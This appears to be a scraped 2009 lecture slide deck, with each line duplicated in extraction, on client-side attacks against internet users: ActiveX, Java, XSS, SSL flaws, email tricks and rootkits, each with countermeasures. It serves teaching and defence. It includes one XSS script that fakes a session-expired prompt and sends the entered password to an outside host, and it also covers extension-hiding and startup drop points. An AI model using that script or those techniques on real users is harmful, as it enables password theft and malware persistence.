Upload
gwenda-jackson
View
220
Download
0
Tags:
Embed Size (px)
Citation preview
Chapter 12Chapter 12
Hacking the Internet UserHacking the Internet User
Last modified 5-8-09
Internet Client Vulnerabilities Internet Client Vulnerabilities
Microsoft ActiveX Microsoft ActiveX
ActiveX applications, or ActiveX applications, or controls,controls, can be can be written to perform specific functions (such written to perform specific functions (such as displaying a movie or sound file)as displaying a movie or sound file)They can be embedded in a web page to They can be embedded in a web page to provide this functionality provide this functionality ActiveX controls typically have the file ActiveX controls typically have the file extension .ocxextension .ocxThey are embedded within web pages They are embedded within web pages using the <OBJECT> tagusing the <OBJECT> tag
Microsoft ActiveX Microsoft ActiveX
Controls are downloaded to the location Controls are downloaded to the location specified by the Registry string valuespecified by the Registry string value– HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\ActiveXCacheSettings\ActiveXCache
The default location on Windows XP and The default location on Windows XP and Vista is %systemroot%\Downloaded Vista is %systemroot%\Downloaded Program FilesProgram Files– Usually C:\Windows\Downloaded Program Usually C:\Windows\Downloaded Program
FilesFiles
ActiveX Controls on a Vista ActiveX Controls on a Vista MachineMachine
The ActiveX Security Model: The ActiveX Security Model: Authenticode Authenticode
ActiveX controls can do almost anything ActiveX controls can do almost anything
But they can be signed with a digital But they can be signed with a digital signature (Authenticode), so you know signature (Authenticode), so you know who to blamewho to blame
Exploder was a signed control that shut Exploder was a signed control that shut down Win 95 machinesdown Win 95 machines– Microsoft and Verisign revoked its Microsoft and Verisign revoked its
Authenticode software publisher certificateAuthenticode software publisher certificate– Link Ch 13_01Link Ch 13_01
"Safe for Scripting" Vulnerability"Safe for Scripting" Vulnerability
scriptlet.typelibscriptlet.typelib and and Eyedog.ocxEyedog.ocx– ActiveX controls ActiveX controls
shipped with IE 4 and shipped with IE 4 and earlierearlier
– Marked "Safe for Marked "Safe for scripting"scripting"
– Enabled to run without Enabled to run without a warning, bypassing a warning, bypassing AuthenticodeAuthenticode
"Safe for Scripting" Vulnerability"Safe for Scripting" Vulnerability
"Safe for Scripting" controls can be "Safe for Scripting" controls can be abused by malicious Web pages to abused by malicious Web pages to execute arbitrary codeexecute arbitrary code– This exploit was demonstrated in 1999This exploit was demonstrated in 1999
Link Ch 13_02Link Ch 13_02
– But later examples of "Safe for Scripting" But later examples of "Safe for Scripting" exploits existexploits exist
From 2005, as part of the Sony RootkitFrom 2005, as part of the Sony Rootkit– Link Ch 13_03Link Ch 13_03
A nice tutorial from 2008 (link Ch 13_26) A nice tutorial from 2008 (link Ch 13_26)
ActiveX Abuse Countermeasures ActiveX Abuse Countermeasures
IE Users:IE Users:– Restrict or disable ActiveX with Internet Restrict or disable ActiveX with Internet
Explorer security zones Explorer security zones In IE, Tools, Internet Options, Security tabIn IE, Tools, Internet Options, Security tab
Developers:Developers:– Don't write safe-for-scripting controls that Don't write safe-for-scripting controls that
could perform dangerous acts, like file accesscould perform dangerous acts, like file access
ActiveX Abuse Countermeasures ActiveX Abuse Countermeasures
Developers:Developers:– Use SiteLock to restrict access so that the Use SiteLock to restrict access so that the
control is only deemed safe in a control is only deemed safe in a predetermined list of domains predetermined list of domains
Link Ch 13_05Link Ch 13_05
– Disable unwanted ActiveX controls with the Disable unwanted ActiveX controls with the Kill BitKill Bit
Link Ch 13_06Link Ch 13_06
JavaJava
Java runs in a "sandbox" using the Java Java runs in a "sandbox" using the Java Virtual Machine, which makes it much Virtual Machine, which makes it much safer than ActiveXsafer than ActiveXBut flaws that allow code to escape the But flaws that allow code to escape the sandbox have been discoveredsandbox have been discovered– Type confusion attackType confusion attack in 1999 in 1999– Brown orifice Brown orifice in 2000 (link Ch 13_07)in 2000 (link Ch 13_07)– Java Virtual Machine remote compromise by Java Virtual Machine remote compromise by
heap overflow in 2005 (link Ch 13_08)heap overflow in 2005 (link Ch 13_08)
Java Abuse Countermeasures Java Abuse Countermeasures
Restrict Java through the use of Microsoft Restrict Java through the use of Microsoft Internet Explorer security zones Internet Explorer security zones
Keep your Java platform updatedKeep your Java platform updated
JavaScript and Active Scripting JavaScript and Active Scripting
Javascript was created by Netscape in the mid-Javascript was created by Netscape in the mid-1990s1990s– It has nothing to do with Sun's JavaIt has nothing to do with Sun's Java
Microsoft platforms execute JavaScript and Microsoft platforms execute JavaScript and other client-side scripting languages (such as other client-side scripting languages (such as Microsoft's own VBScript) using a Component Microsoft's own VBScript) using a Component Object Model (COM)-based technology called Object Model (COM)-based technology called Active ScriptingActive Scripting
Javascript is powerful and easy to use, and Javascript is powerful and easy to use, and often used for malicious purposes, such as pop-often used for malicious purposes, such as pop-up ads up ads
JavaScript/Active Scripting Abuse JavaScript/Active Scripting Abuse CountermeasuresCountermeasures
Use Internet Explorer security zones Use Internet Explorer security zones
Use the "Noscript" Firefox extensionUse the "Noscript" Firefox extension
Cookies Cookies
Cookies allow websites to remember who Cookies allow websites to remember who you are from visit to visit you are from visit to visit
Sniffing cookies can reveal data, or allow Sniffing cookies can reveal data, or allow you to "sidejack" authenticated sessionsyou to "sidejack" authenticated sessions
Cookie Abuse Countermeasures Cookie Abuse Countermeasures
In IE, you can control cookie handling in In IE, you can control cookie handling in Internet Options on the Privacy tabInternet Options on the Privacy tab
Use SSL when possibleUse SSL when possible– https://mail.google.com, not gmail.comhttps://mail.google.com, not gmail.com
Cross-Site Scripting (XSS) Cross-Site Scripting (XSS)
This script will harvestThis script will harvest passwords from passwords from unwary usersunwary users– <SCRIPT Language="Javascript">var password=prompt <SCRIPT Language="Javascript">var password=prompt ('Your session has expired. Please enter your ('Your session has expired. Please enter your password to continue.',''); password to continue.',''); location.href="http://samsclass.info?location.href="http://samsclass.info?passwd="+password;</SCRIPT>passwd="+password;</SCRIPT>
Demo at http://fog.ccsf.edu/~sbowne/feedback-Demo at http://fog.ccsf.edu/~sbowne/feedback-vulnerable.htmlvulnerable.html
Many other attacks are possible, such as stealing Many other attacks are possible, such as stealing cookiescookies
Cross-Frame/Domain Cross-Frame/Domain Vulnerabilities Vulnerabilities
Like XSS, but operating on the clientLike XSS, but operating on the client– Tricking your browser into executing code Tricking your browser into executing code
from frame in a different framefrom frame in a different frame
IE has access to the local file system, IE has access to the local file system, calling it the Local Machine Zone (LMZ)calling it the Local Machine Zone (LMZ)– A common target for attacksA common target for attacks– There are a lot of Cross-Frame attacks at link There are a lot of Cross-Frame attacks at link
Ch 13_09Ch 13_09
Cross-Frame/Domain Cross-Frame/Domain Vulnerabilities Vulnerabilities
The IFRAME Tag The IFRAME Tag – IFrames add a frame from another site in the IFrames add a frame from another site in the
middle of a Web pagemiddle of a Web page– Used in many attacksUsed in many attacks
Link Ch 13_10 from 2008Link Ch 13_10 from 2008
HTML Help ActiveX Control HTML Help ActiveX Control – Runs in the LMZ zoneRuns in the LMZ zone– A popular target for exploitsA popular target for exploits
SSL Attacks SSL Attacks
When it works, SSL ensures that a server When it works, SSL ensures that a server is genuine, and warns the client if a man-in-is genuine, and warns the client if a man-in-the-middle (MITM) attack is in progressthe-middle (MITM) attack is in progress
Netscape failed to re-check later Netscape failed to re-check later connections to the same IP addressconnections to the same IP address– From the year 2000, link Ch 13_10From the year 2000, link Ch 13_10
Firefox fails to properly check for revoked Firefox fails to properly check for revoked certificatescertificates– From 2009, link Ch_13_27From 2009, link Ch_13_27
SSL Vulnerabilities in IESSL Vulnerabilities in IE
IE failed to check server names and IE failed to check server names and expiration dates on certificatesexpiration dates on certificates
Failed to revalidate certificates on Failed to revalidate certificates on reconnection to the same serverreconnection to the same server
Errors in SSL Certificate Revocation List Errors in SSL Certificate Revocation List (CRL)-checking routines (CRL)-checking routines – See links Ch 13_11, 13_12See links Ch 13_11, 13_12
Homograph Attacks Homograph Attacks
Using non-English language characters, it Using non-English language characters, it was possible to buy a domain name that was possible to buy a domain name that looked like looked like paypal.com paypal.com but wasn'tbut wasn't
This has been patched in the latest This has been patched in the latest browser versionsbrowser versions– Link Ch_13_13Link Ch_13_13
SSL Attack Countermeasures SSL Attack Countermeasures
Keep your Internet client software fully Keep your Internet client software fully updated and patched updated and patched
Check certificate manuallyCheck certificate manually
Payloads and Drop Points Payloads and Drop Points
Places to put code to make it launch at Places to put code to make it launch at startupstartup– Microsoft Excel .xla file or compiled HTML Microsoft Excel .xla file or compiled HTML
help file (.chm) into a user's Windows startup help file (.chm) into a user's Windows startup folder folder
– Run keys in the Windows RegistryRun keys in the Windows Registry– Using the showHelp()method and Microsoft's Using the showHelp()method and Microsoft's
HTML Help hh.exe to launch .chm and .htm HTML Help hh.exe to launch .chm and .htm files directly from exploitsfiles directly from exploits
– Dropping malicious links into the IE startup Dropping malicious links into the IE startup page Registry values page Registry values
Auto-Start Extensibility Points Auto-Start Extensibility Points (ASEPs)(ASEPs)
Link Ch 13_15Link Ch 13_15
Windows DefenderWindows Defender
MsconfigMsconfig
E-mail Hacking E-mail Hacking
File Attachments File Attachments – Windows scrap files can be used to execute Windows scrap files can be used to execute
codecode– File extensions can be hidden with spacesFile extensions can be hidden with spaces
freemp3.doc . . . [150 spaces] . . . .exefreemp3.doc . . . [150 spaces] . . . .exe
– IFrames can be used to execute an attached IFrames can be used to execute an attached file within an HTML-enabled emailfile within an HTML-enabled email
– Just trick the user into opening the attachment Just trick the user into opening the attachment with social engineering, as MyDoom did in 2004 with social engineering, as MyDoom did in 2004 (link Ch 13_16)(link Ch 13_16)
Error message about attachmentError message about attachment
Multi-part Internet Mail Extensions Multi-part Internet Mail Extensions (MIME) (MIME)
In 2000, executable file types were In 2000, executable file types were automatically executed within IE or HTML automatically executed within IE or HTML e-mail messages if they were mislabeled e-mail messages if they were mislabeled as the incorrect MIME typeas the incorrect MIME typeThe Nimda Worm exploited this The Nimda Worm exploited this vulnerabilityvulnerability– Although the patch was available, it had not Although the patch was available, it had not
been implemented widely enoughbeen implemented widely enough– Link Ch 13_17 Link Ch 13_17
E-mail Hacking Countermeasures E-mail Hacking Countermeasures
Patch the vulnerabilities Patch the vulnerabilities
Disable rendering of HTML mail altogetherDisable rendering of HTML mail altogether
Block ActiveX and JavaScript in EmailBlock ActiveX and JavaScript in Email– Microsoft Outlook and Outlook Express now Microsoft Outlook and Outlook Express now
set the Restricted Sites zone for reading e-set the Restricted Sites zone for reading e-mail by defaultmail by default
Don't open attachments you don't expectDon't open attachments you don't expect
Instant Messaging (IM) Instant Messaging (IM)
Tricks users into Tricks users into clicking on links or clicking on links or accepting file accepting file transferstransfers
May also exploit IM May also exploit IM software software vulnerabilitiesvulnerabilities– Link Ch 13_18Link Ch 13_18
Microsoft Internet Client Microsoft Internet Client Exploits Exploits
GDI+ JPEG Processing Buffer GDI+ JPEG Processing Buffer Overflow (IE6 SP1) Overflow (IE6 SP1)
– Allowed remote control on any machine that Allowed remote control on any machine that renders a malicious JPEG (Link Ch 13_19)renders a malicious JPEG (Link Ch 13_19)
CountermeasuresCountermeasures– Firewall that filters outgoing traffic might block Firewall that filters outgoing traffic might block
the remote controlthe remote control– Updated antivirus softwareUpdated antivirus software– Updates patchesUpdates patches– Read email in text-only formatRead email in text-only format– Run as a Limited user, not an AdministratorRun as a Limited user, not an Administrator
IE Improper URL Canonicalization IE Improper URL Canonicalization
IE failed to properly display in its address IE failed to properly display in its address bar any URLs of the formatbar any URLs of the format– user@domain
when a nonprinting character (%01, or 1 in when a nonprinting character (%01, or 1 in hexadecimal) was placed before the "@" hexadecimal) was placed before the "@" character character IE 7 & Firefox nowIE 7 & Firefox nowwarn youwarn youof thisof thisIE8 seems to IE8 seems to block itblock it– Link Ch 13_22Link Ch 13_22
Web Application FirewallWeb Application Firewall
• Prevents Prevents canonicalizatcanonicalization attacks, ion attacks, SQL SQL Injection, Injection, etc.etc.• Links Links
Ch_13_28, Ch_13_28, Ch_13_29Ch_13_29
IE HTML HelpControl Local IE HTML HelpControl Local Execution Execution
Opens a Microsoft help page on the C: Opens a Microsoft help page on the C: drive, in the Local Machine Zone (LMZ)drive, in the Local Machine Zone (LMZ)
The exploit code then opens a second The exploit code then opens a second window, which injects executable window, which injects executable JavaScript into the LMZ window JavaScript into the LMZ window – Can install software on the local machineCan install software on the local machine
General Microsoft Client-Side General Microsoft Client-Side Countermeasures Countermeasures
Use a firewall that can filter outgoing Use a firewall that can filter outgoing connectionsconnections
Keep up-to-date on patchesKeep up-to-date on patches
Use antivirus softwareUse antivirus software
Use IE Security Zones wiselyUse IE Security Zones wisely
Run with least privilege—not as Run with least privilege—not as Administrator Administrator
Read email in plaintextRead email in plaintext
General Microsoft Client-Side General Microsoft Client-Side Countermeasures Countermeasures
Administrators of large networks should Administrators of large networks should deploy firewalls at key points and use deploy firewalls at key points and use Group Policy to enforce security measuresGroup Policy to enforce security measures
General Microsoft Client-Side General Microsoft Client-Side Countermeasures Countermeasures
Configure office productivity programs as Configure office productivity programs as securely as possiblesecurely as possible– Set the Microsoft Office programs to "Very High" Set the Microsoft Office programs to "Very High"
macro security under Tools | Macro | Securitymacro security under Tools | Macro | Security
Don't be gullible. Approach Internet-borne Don't be gullible. Approach Internet-borne solicitations and transactions with high solicitations and transactions with high skepticismskepticism
Keep your computing devices physically secureKeep your computing devices physically secure
Skip pages 611-624Skip pages 611-624
Rootkits and Back Doors Rootkits and Back Doors
DKOMDKOM(Direct Kernel Object (Direct Kernel Object
Manipulation)Manipulation)
From a Powerpoint written by Jamie Butler
Link Ch 13_25
From a Powerpoint written by Jamie Butler
Link Ch 13_25
Operating System DesignOperating System Design
User LandUser Land– Operating system provides common API for Operating system provides common API for
developers to usedevelopers to useKernel32.dllKernel32.dllNtdll.dllNtdll.dll
Kernel ModeKernel Mode– The low level kernel functions that The low level kernel functions that
implement the services needed in user landimplement the services needed in user land– Protected memory containing objects such Protected memory containing objects such
as those for processes, tokens, ports, etc.as those for processes, tokens, ports, etc.
Operating System DesignOperating System Design
Intel has four Intel has four privilege privilege levels or ringslevels or rings
Microsoft and Microsoft and many other many other OS vendors OS vendors use only two use only two ringsrings
Operating System DesignOperating System Design
By only using two privilege levels, there is By only using two privilege levels, there is no separation between the kernel itself no separation between the kernel itself and third party drivers or loadable kernel and third party drivers or loadable kernel modules (LKM’s)modules (LKM’s)
Drivers can modify the memory associated Drivers can modify the memory associated with kernel objects such as those that with kernel objects such as those that represent a process’s tokenrepresent a process’s token
Consumers demand more…Consumers demand more…
Corporations and many private consumers Corporations and many private consumers see the need for more securitysee the need for more security– Personal firewallsPersonal firewalls– Host based intrusion detection systems Host based intrusion detection systems
(HIDS)(HIDS)– Host based intrusion prevention systems Host based intrusion prevention systems
(HIPS)(HIPS)
Current HIDS/HIPS FunctionsCurrent HIDS/HIPS Functions
To detect or prevent:To detect or prevent:– Processes runningProcesses running– Files that are created/deleted/modifiedFiles that are created/deleted/modified– Network connections madeNetwork connections made– Privilege escalationPrivilege escalation
Trusts the operating system to report these Trusts the operating system to report these activities.activities.If the underlying operating system is If the underlying operating system is compromised, the HIDS/HIPS fails.compromised, the HIDS/HIPS fails.
What Makes HIDS/HIPS What Makes HIDS/HIPS Possible?Possible?
Querying kernel reporting functionsQuerying kernel reporting functions
Hooking user land API functionsHooking user land API functions– Kernel32.dllKernel32.dll– Ntdll.dllNtdll.dll
Hooking the System Call TableHooking the System Call Table
Registering OS provided call-back Registering OS provided call-back functionsfunctions
Attack ScenarioAttack Scenario
Attacker gains elevated access to computer Attacker gains elevated access to computer systemsystemAttacker installs a RootkitAttacker installs a RootkitRootkit’s functionsRootkit’s functions– Hide processesHide processes– Hide filesHide files– Hide network connectionsHide network connections– Install a backdoor for future access to the systemInstall a backdoor for future access to the system
Rootkits act as a part of the operating system so Rootkits act as a part of the operating system so they have access to kernel memory.they have access to kernel memory.
State of Current RootkitsState of Current Rootkits
UntilUntil recently, rootkits were nothing more than recently, rootkits were nothing more than Trojan programs such as ps, ls, top, du, and Trojan programs such as ps, ls, top, du, and netstatnetstat
Advanced rootkits Advanced rootkits filterfilter data data– Hook the System Call Table of the operating system Hook the System Call Table of the operating system
(the functions exported by the kernel)(the functions exported by the kernel)– Hook the Interrupt Descriptor Table (IDT)Hook the Interrupt Descriptor Table (IDT)
Interrupts are used to signal to the kernel that it has work to Interrupts are used to signal to the kernel that it has work to perform.perform.
By hooking one interrupt, a clever rootkit can filter all By hooking one interrupt, a clever rootkit can filter all exported kernel functions.exported kernel functions.
Demonstration: Hacker Defender Demonstration: Hacker Defender RootkitRootkit
Hides files, Hides files, processes, processes, network network connections, and connections, and moremoreWorks on Win XP Works on Win XP SP2SP2Damages the OS Damages the OS – Use a VM and – Use a VM and discard it when discard it when done!done!
Other Common RootkitsOther Common Rootkits
FU - consists of two components: a user-FU - consists of two components: a user-mode dropper (fu.exe) and a kernel-mode mode dropper (fu.exe) and a kernel-mode driver (msdirectx.sys)driver (msdirectx.sys)Vanquish - a DLL injection-based Vanquish - a DLL injection-based Romanian rootkitRomanian rootkitAFX Rootkit by Aphex is composed of two AFX Rootkit by Aphex is composed of two files, iexplore.dll and explorer.dll, which it files, iexplore.dll and explorer.dll, which it names "iexplore.exe" and "explorer.exe" names "iexplore.exe" and "explorer.exe" and copies to the system folder and copies to the system folder